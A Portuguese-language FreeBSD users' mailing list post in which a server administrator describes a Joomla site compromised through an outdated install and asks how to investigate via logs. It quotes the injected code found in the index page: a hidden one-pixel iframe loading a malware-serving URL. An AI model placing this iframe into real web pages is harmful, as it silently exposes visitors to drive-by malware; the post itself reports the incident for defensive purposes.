[FUG-BR] [off-topic] Index modificado

[Siclal Oliveira]

Olá lista

Esta é minha primeira participação na lista.
Já trabalho há algum tempo com Freebsd, de forma que espero poder
contribuir de alguma forma.

Bem, estou com um problema em um dos servidores que administro:
O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do
php e do mysql atualizados.
Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que
eu desabilitasse o safe mode do php.
A atualização do Joomla ficaria por conta dele, mas para a minha
surpresa, atualmente está utilizando a versão 1.0.15, quando a mais
atualizada seria a 1.5.9.
Fui chamado porque ao abrir a página era startado um direcionamento a
uma página com vírus.
Verificando o index, percebi que havia sido inserido um código
malicioso não última linha:

<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1
height=1 style="visibility: hidden"></iframe></body></html>

Eu imagino que a insersão deva ter ocorrido a partir de alguma falha
do joomla, mas gostaria de saber como proceder com os logs a fim de
identificar este incidente.
Como eu poderia saber se o meu servidor foi afetado gravemente.

Desde já agradeço.

Abraços a todos.

Siclal